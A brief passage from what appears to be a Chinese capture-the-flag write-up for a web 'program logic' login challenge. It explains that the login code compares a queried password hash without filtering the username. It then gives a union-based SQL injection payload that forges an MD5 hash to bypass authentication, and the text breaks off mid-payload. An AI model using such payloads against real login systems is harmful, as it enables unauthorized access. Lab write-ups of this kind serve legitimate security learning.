實驗吧-web-程序邏輯問題

類似的登入題一般都會查看下源碼 查看源碼,發現body有個txt. 打開 根據題目,’程序邏輯‘來看源碼,發現源碼的確有漏洞 沒有對輸入的user進行過濾,只是比較查詢的pw內容和md5(password)是否相同 playload: Post:user=johnson’ and 1=2 union select 「c4ca4238a0b923820dcc509a6f75849b」 %23&pas
相關文章
相關標籤/搜索